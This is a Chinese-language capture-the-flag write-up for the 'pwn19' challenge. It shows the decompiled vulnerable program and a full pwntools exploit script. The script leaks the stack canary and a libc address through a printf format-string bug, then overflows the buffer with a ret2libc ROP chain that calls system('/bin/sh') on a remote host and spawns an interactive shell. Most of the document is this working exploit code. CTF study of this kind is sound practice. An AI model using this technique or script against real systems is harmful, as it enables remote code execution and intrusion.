![[冀信2021-pwn] pwn19](http://www.mshxw.com/aiimages/31/664866.png "[冀信2021-pwn] pwn19")
这是一个简单的printf+溢出题,可以输入2次6位的串用来printf,然后输入串溢出。
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v5; // [rsp+Ch] [rbp-34h]
__int64 buf[5]; // [rsp+10h] [rbp-30h] BYREF
unsigned __int64 v7; // [rsp+38h] [rbp-8h]
v7 = __readfsqword(0x28u);
buf[0] = 0LL;
buf[1] = 0LL;
buf[2] = 0LL;
buf[3] = 0LL;
v5 = 0;
init(argc, argv, envp);
puts("echo server start up");
while ( v5 <= 1 )
{
*((_BYTE *)buf + (int)read(0, buf, 6uLL)) = 0;
printf((const char *)buf);
++v5;
}
puts("your gift~");
read(0, buf, 0x100uLL);
return __readfsqword(0x28u) ^ v7;
}
这个题有canary所以溢出一定要有canary,另外一个必需的就是libc,所以这两个printf确定为13和15
题目没有给libc,所以需要得到libc后查版本,通过第一步查到是libc-2.23-0ubuntu11.3就能用。由于开了PIE加载地址是随机的所以pop_rdi也要从libc里找
from pwn import *
local =0
if local == 1:
p = process('./pwn19')
libc_elf = ELF('/lib/x86_64-linux-gnu/libc.so.6') #2.31
libc_start_main_ret = 0x0270b3
else:
p = remote('82.157.18.9', 55302)
libc_elf = ELF('./libc6_2.23-0ubuntu11.3_amd64.so')
libc_start_main_ret = 0x020840
context(arch='amd64', log_level='debug')
p.sendlineafter(b'n', b'%13$p')
canary = int(p.recvline()[:-1], 16)
p.sendline(b'%15$p')
libc_base = int(p.recvline()[:-1], 16) - libc_start_main_ret
pop_rdi = libc_base + next(libc_elf.search(asm('pop rdi;ret')))
system = libc_base + libc_elf.sym['system']
bin_sh = libc_base + next(libc_elf.search(b'/bin/sh'))
payload = flat(b'A'*0x28, canary, 0, pop_rdi+1, pop_rdi, bin_sh, system)
p.sendlineafter(b"your gift~n" , payload)
p.interactive()
